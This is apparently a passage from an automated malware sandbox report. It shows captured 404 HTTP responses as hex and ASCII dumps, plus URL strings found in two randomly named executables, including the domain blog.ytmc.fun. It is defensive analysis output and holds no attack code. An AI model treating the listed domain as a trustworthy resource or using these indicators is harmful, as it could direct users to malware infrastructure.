Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 07:35:46 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 07:35:49 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 08 Jul 2024 07:36:30 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 08 Jul 2024 07:36:32 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 08 Jul 2024 07:36:35 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Mon, 08 Jul 2024 07:36:37 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 07:36:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web2X-Frontend: frontend1X-Trace-Id: ti_ace6c878ffe446dba7a57a3ca9ee6246Content-Encoding: gzipData Raw: 31 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 52 b1 4e c3 30 10 dd fb 15 47 16 16 c8 b5 08 24 84 d2 2c c0 c0 02 1d 90 10 e3 d5 b9 d4 56 1d 3b b2 2f 0d f9 7b ec a4 5d 90 f0 62 dd f9 de bb f7 9e 5c 5d bd 7c 3c 7f 7e ef 5e 41 4b 67 eb 55 75 b9 98 9a 54 89 11 cb f5 bb 87 9e 0e 0c ad 1f 5c 53 e1 d2 5c 55 d6 b8 23 04 b6 db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 60 9c e4 fc ce ca f1 9c 2f 2e 1f e1 17 03 33 d4 70 20 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 15fuRN0G$,V;/{]b\]|<~^AKgUuT\S\U#"d9jf)@ZO8-E!rP;)5D|H2+gLRP/RIK>}_R4uVU_1(?]5@?D3F&?D#L14c!3@XD(a:dvPX~tn"4>{'9,CQ9a$gWj=jnn=7VI;q}vH`/.3p 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 07:36:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web2X-Frontend: frontend1X-Trace-Id: ti_a6efb1f31221a247a14ca3c0e8b38e20Content-Encoding: gzipData Raw: 31 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 52 b1 4e c3 30 10 dd fb 15 47 16 16 c8 b5 08 24 84 d2 2c c0 c0 02 1d 90 10 e3 d5 b9 d4 56 1d 3b b2 2f 0d f9 7b ec a4 5d 90 f0 62 dd f9 de bb f7 9e 5c 5d bd 7c 3c 7f 7e ef 5e 41 4b 67 eb 55 75 b9 98 9a 54 89 11 cb f5 bb 87 9e 0e 0c ad 1f 5c 53 e1 d2 5c 55 d6 b8 23 04 b6 db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 60 9c e4 fc ce ca f1 9c 2f 2e 1f e1 17 03 33 d4 70 20 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 15fuRN0G$,V;/{]b\]|<~^AKgUuT\S\U#"d9jf)@ZO8-E!rP;)5D|H2+gLRP/RIK>}_R4uVU_1(?]5@?D3F&?D#L14c!3@XD(a:dvPX~tn"4>{'9,CQ9a$gWj=jnn=7VI;q}vH`/.3p 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 07:36:56 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web2X-Frontend: frontend1X-Trace-Id: ti_f36ea58d1e3d6efb07d1ea9618fb2aa1Content-Encoding: gzipData Raw: 31 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 52 b1 4e c3 30 10 dd fb 15 47 16 16 c8 b5 08 24 84 d2 2c c0 c0 02 1d 90 10 e3 d5 b9 d4 56 1d 3b b2 2f 0d f9 7b ec a4 5d 90 f0 62 dd f9 de bb f7 9e 5c 5d bd 7c 3c 7f 7e ef 5e 41 4b 67 eb 55 75 b9 98 9a 54 89 11 cb f5 bb 87 9e 0e 0c ad 1f 5c 53 e1 d2 5c 55 d6 b8 23 04 b6 db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 60 9c e4 fc ce ca f1 9c 2f 2e 1f e1 17 03 33 d4 70 20 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 15fuRN0G$,V;/{]b\]|<~^AKgUuT\S\U#"d9jf)@ZO8-E!rP;)5D|H2+gLRP/RIK>}_R4uVU_1(?]5@?D3F&?D#L14c!3@XD(a:dvPX~tn"4>{'9,CQ9a$gWj=jnn=7VI;q}vH`/.3p 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 07:36:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 544Connection: closex-backend: web2X-Frontend: frontend1X-Trace-Id: ti_13f27a3d4ba3fee707956bee565fe02dData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 2c 20 79 6f 75 20 63 61 6e 20 73 65 74 75 70 20 61 20 70 61 67 65 20 68 65 72 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 2e 68 65 6c 70 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 31 35 30 30 30 30 30 32 38 30 31 34 31 22 3e 63 72 65 61 74 69 6e 67 20 61 20 70 61 67 65 2f 77 65 62 73 69 74 65 20 69 6e 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
            Source: jlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.drString found in binary or memory: http://blog.ytmc.fun
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1697745017.0000000002778000.00000004.00000800.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 00000009.00000002.1799689113.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
